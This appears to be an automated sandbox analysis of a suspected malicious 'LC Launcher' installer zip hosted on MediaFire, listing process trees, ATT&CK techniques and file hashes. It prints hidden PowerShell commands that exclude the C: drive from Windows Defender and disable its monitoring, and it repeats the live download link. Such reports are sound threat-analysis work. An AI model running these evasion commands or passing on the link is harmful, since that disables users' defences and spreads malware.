hxxps://www[.]mediafire[.]com/file/7apya0a6uyw65ax/LC_Inst_3[.]1[.]1[.]zip/file

Analysis

max time kernel
357s
max time network
359s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
28/06/2024, 11:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.mediafire.com/file/7apya0a6uyw65ax/LC_Inst_3.1.1.zip/file

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
2120	powershell.exe
560	Powershell.exe
1600	Powershell.exe
1592	Powershell.exe
2376	Powershell.exe
1544	Powershell.exe
2376	Powershell.exe
2240	powershell.exe
1928	powershell.exe
2620	powershell.exe
2396	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
348	LC Launcher Setup.exe
1612	javaw.exe
1936	1719575388325.exe

Loads dropped DLL 33 IoCs

pid	Process
348	LC Launcher Setup.exe
348	LC Launcher Setup.exe
348	LC Launcher Setup.exe
348	LC Launcher Setup.exe
348	LC Launcher Setup.exe
348	LC Launcher Setup.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
1612	javaw.exe
2120	powershell.exe
2120	powershell.exe
1936	1719575388325.exe
1936	1719575388325.exe
1516	WerFault.exe
1516	WerFault.exe
1516	WerFault.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1516	1936	WerFault.exe	76

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
560	Powershell.exe
1600	Powershell.exe
1544	Powershell.exe
2376	Powershell.exe
2376	Powershell.exe
2376	Powershell.exe
1600	Powershell.exe
1600	Powershell.exe
560	Powershell.exe
560	Powershell.exe
1544	Powershell.exe
1544	Powershell.exe
2620	powershell.exe
2240	powershell.exe
1928	powershell.exe
2396	powershell.exe
1592	Powershell.exe
1592	Powershell.exe
1592	Powershell.exe
2120	powershell.exe
2120	powershell.exe
2120	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe
Token: SeShutdownPrivilege	2140	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe
2140	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1612	javaw.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2140 wrote to memory of 1288	2140	chrome.exe	28
PID 2140 wrote to memory of 1288	2140	chrome.exe	28
PID 2140 wrote to memory of 1288	2140	chrome.exe	28
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 2904	2140	chrome.exe	30
PID 2140 wrote to memory of 1396	2140	chrome.exe	31
PID 2140 wrote to memory of 1396	2140	chrome.exe	31
PID 2140 wrote to memory of 1396	2140	chrome.exe	31
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32
PID 2140 wrote to memory of 2568	2140	chrome.exe	32

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.mediafire.com/file/7apya0a6uyw65ax/LC_Inst_3.1.1.zip/file
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6ce9758,0x7fef6ce9768,0x7fef6ce9778
  2⤵
  PID:1288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:2
  2⤵
  PID:2904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:8
  2⤵
  PID:1396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:8
  2⤵
  PID:2568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2208 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:1
  2⤵
  PID:2208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2216 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:1
  2⤵
  PID:1976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1144 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:2
  2⤵
  PID:1620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3624 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:1
  2⤵
  PID:792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4236 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:1
  2⤵
  PID:536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3856 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:1
  2⤵
  PID:1788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3808 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:1
  2⤵
  PID:1148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3784 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:1
  2⤵
  PID:2088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4084 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:8
  2⤵
  PID:2868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4100 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:1
  2⤵
  PID:3052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5064 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:1
  2⤵
  PID:2876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4948 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:1
  2⤵
  PID:2588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3992 --field-trial-handle=1276,i,7984512780674487533,1065501012273002886,131072 /prefetch:8
  2⤵
  PID:2532

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2864

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1524

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\LC_Inst_3.1.1\" -spe -an -ai#7zMap28423:88:7zEvent26021
1⤵
PID:3056

C:\Users\Admin\Downloads\LC_Inst_3.1.1\LC Launcher Setup.exe
"C:\Users\Admin\Downloads\LC_Inst_3.1.1\LC Launcher Setup.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:348
- C:\Users\Admin\Downloads\LC_Inst_3.1.1\jre\bin\javaw.exe
  "C:\Users\Admin\Downloads\LC_Inst_3.1.1\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  PID:1612
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2376
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2240
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1544
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2620
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:560
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1928
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1600
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2396
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Start-Process "C:\Users\Admin\AppData\Local\Temp\/1719575388325.exe"'}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1592
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process C:\Users\Admin\AppData\Local\Temp\/1719575388325.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:2120
    - - C:\Users\Admin\AppData\Local\Temp\1719575388325.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1719575388325.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1936
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 272
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:1516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416

Filesize
1KB

MD5
55540a230bdab55187a841cfe1aa1545

SHA1
363e4734f757bdeb89868efe94907774a327695e

SHA256
d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb

SHA512
c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F59A01A8B782D93EA6991BC172CEFFB1

Filesize
867B

MD5
c5dfb849ca051355ee2dba1ac33eb028

SHA1
d69b561148f01c77c54578c10926df5b856976ad

SHA256
cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b

SHA512
88289cdd2c2dd1f5f4c13ab2cf9bc601fc634b5945309bedf9fc5b96bf21697b4cd6da2f383497825e02272816befbac4f44955282ffbbd4dd0ddc52281082da

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416

Filesize
230B

MD5
eeab8df4a287b7e241588113b57f4370

SHA1
65918230b0d8b79dc89798c4a6fa0702ed68e4f0

SHA256
1412e0a5a10caed980ab9eb1709489631ae8d72519010e56ba2b43cd6d6015fc

SHA512
70321f2ba619912332e333c13d2398e3dc8ad72d93c5896f8fdfbd95f597ad0f55c66ec5d02ae614d7d75ea9fe821d5cdcc8e41d13610184a125e6f7a2768072

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7574a8b5ef7c335021075ddff4ab2e38

SHA1
ab497cd550874d228f40e2adf55abea3a913c323

SHA256
10da954aa11c92c61d6c79129120c7315fef242173c0624d94a5b448b7c9463e

SHA512
1931145bb708865bf030046a8e32ef6614198dac9fecf8c9fd3e59352688dde6251385b3700a28ecb33a0bfe0b7165c34e217a0e0ae4c4dcf6d60ea310797ac1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c4815db4324d40f8a131c641a93bf7de

SHA1
e8407c1ac7673d5c8b4731998df62cac7cc56c34

SHA256
e68885cca3e3ec92588a0c8b533d9f217a4d6c1a1e13917d63a414d2983716c5

SHA512
